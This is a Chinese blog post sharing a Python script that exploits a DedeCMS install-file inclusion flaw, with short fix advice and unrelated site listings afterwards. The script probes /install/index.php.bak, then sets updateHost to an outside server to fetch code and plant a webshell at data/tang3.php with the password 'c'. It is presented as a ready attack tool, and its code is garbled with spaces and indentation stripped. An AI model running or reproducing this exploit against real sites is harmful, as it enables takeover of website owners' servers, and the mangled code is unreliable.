最新python织梦dedecms远程执行脚本【详细介绍】

HI,大家好,废话不多说,直接上干货:最新python织梦dedecms远程执行脚本,以及织梦cms漏洞漏洞,脚本,视频教程相关的问题,主要就是想给大家提供一个思路分享给大家,毕竟也是经过一系列总结过的哈!

织梦CMS是使用最多的CMS之 一,但是漏洞也非常多。分享一款python写的织梦远程文件包含漏洞。修复此漏洞方法,请见文章底部。

织梦CMS漏洞代码

#!/usr/bin/envpython
#coding=utf-8
#Joseph(小续)
importrequests
importsys
importre
defmain():
try:
url="http://"+sys.argv[1].strip('http://')
exceptIndexError:
print'''
poc:dede.py[url]http://www.baidu.com/[/url]
'''
payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"
urlpoc=url+payload
code=requests.get(urlpoc).status_code
ifcode==200:
printu"恭喜存在此漏洞"
printu"Ongoingattacks--->>>>>"
exploit(url)
pass
else:
printu"sorry漏洞正在挣扎"
pass
defexploit(url):
urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=https://www.tuiedu.org/"
htmlcontent=requests.get(urlpoc).content
Probe=re.compile(r'存在')
ifProbe.findall(htmlcontent):
printu'''
ver:getshell成功
shell:url+/data/tang3.php?a=0密码为:c
'''
pass
else:
printu"请看远程地址是否已经不可用"
pass
if__name__=='__main__':
main()

修复方法

1、建议安装完成后,删除(改名)install文件夹。

2、给data文件夹改名,或者移动位置。

3、到织梦后台,升级到最新的版本

4、官方网站下载最新补丁包手动更新到最新版本。

5、不用谢!

相关专题

Python

Python

2020-11-19 192

Python专题为了整理了关于Python学习资料,包含Python入门视频教程,Python视频教程,Python电子书,Python手册下载等等.

  • Python一键安装卸载工具V1.0
    [2022-07-21]
  • Python+HTML随机点名抽奖源码模板
    [2021-11-01]
  • [阿里云盘]python爬虫验证码识别破解教程
    [2021-09-19]
  • Python百度贴吧一键自动签到脚本
    [2021-06-10]
  • Python语法整理合集pdf电子书
    [2021-04-23]

好了,这篇文章就到这里吧,希望你看到这篇文章以后能有所启发,阅读完最新python织梦dedecms远程执行脚本【详细介绍】感觉学到很多知识,那就帮忙点个赞吧!也可以收藏寂寞网哈!

本文发布者:站长老油条,不代表寂寞网立场,转载请注明出处:https://www.jimowang.com/p/20516.html

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 jimowangmail@126.com 举报,一经查实,本站将立刻删除。

(0)
上一篇 2022年12月6日 09:31
下一篇 2022年12月6日 09:33

相关推荐

  • GoDaddy安装SSL证书详细图文教程【一看就会】

    首先,许泞鹪感谢你能坚持经常过来关注我。下面我就来说说GoDaddy安装SSL证书详细图文教程,以及关于GoDaddy安装SSL证书教程证书,域名,下一步的一系列相关内容,其实这篇文章主要还是为新手朋友整理的,总的来说思路还是很重要! GoDaddy国内现在已经有了中文版本了,大家可以选择简体中文即可。 安装步骤 1.登录到GoDaddy账户后,在“ssl …

    技术 2022年12月14日
  • 百度编辑器toolbarstoolbars工具条功能按钮参考【一看就会】

    小伙伴们大家好,今天锦琪给大家分析下关于百度编辑器toolbarstoolbars工具条功能按钮参考的问题,以及百度编辑器工具栏插件,代码,格式等等相关的各种干货,认真阅读完,把我想表达的思路完全理解,相信你很快就可以掌握! 修改ueditor.config.js里面的toolbars,以下是默认的toolbars代码 toolbars:[ [‘fullsc…

    2022年10月2日
  • 子账号登录常见问题及解决方法(子账号登录问题排解指南)

    子账号登录常见问题及解决方法(子账号登录问题排解指南) 子账号是企业管理员为企业管理成员设置的账号,在登录子账号时,可能会遇到一些问题。本文将介绍子账号登录时可能出现的常见问题及解决方法,帮助企业管理成员更好地使用子账号。 一、账号无法登录 1. 确认账号信息是否正确,如账号名、密码等。2. 检查网络连接是否正常,尝试重新登录。3. 如果仍无法登录,联系企业…

    2023年9月8日
  • 招聘渠道的优劣势分析及对比评测(优劣势分析与比较评测)

    招聘渠道的优劣势分析及对比评测(优劣势分析与比较评测) 一、传统招聘渠道的优劣势分析 1. 纸质媒体广告:这是一种传统的招聘渠道,通过报纸、杂志等纸质媒体发布招聘广告。优势是可以覆盖到不同年龄和教育程度的求职者,劣势是成本高昂、信息更新慢。 2. 人才市场:人才市场提供了一个线下交流的平台,雇主可以直接与求职者进行面对面的沟通和评估。优势是可以实时了解求职者…

    2023年9月15日
  • 百度网盘直连解析+aria2不限速下载方法【推荐干货】

    最近有很多朋友问李冬梅关于百度网盘直连解析+aria2不限速下载方法的问题,以及百度网盘不限速下载链接,收藏,方法等等各种一系列的相关干货,经过我各种整理总结之后,决定写下这篇文章分享给大家。 本文分享的是利用第三方百度网盘直连解析工具+Aria2软件来达到百度网盘不限速下载的方法,大家看操作。 1、下载aria2,这里推荐这个版本:https://dl.m…

    2022年8月6日
  • cloudflare报错50X,网站无法访问解决方法【新手必看】

    小伙伴们你们好,赵文柏很高兴又和各位见面了,今天主要来讲讲cloudflare报错50X,网站无法访问解决方法,以及关于cloudflare报错网站,服务器,截图等等一系列的相关问题,希望你们能通过这篇文章很好的掌握其中的技巧,下面我就来为大家全部一一解析! 前言 前几天赵文柏分享了cloudflare的详细使用方法,今天有朋友反应他按照教程配置cloudf…

    2022年11月1日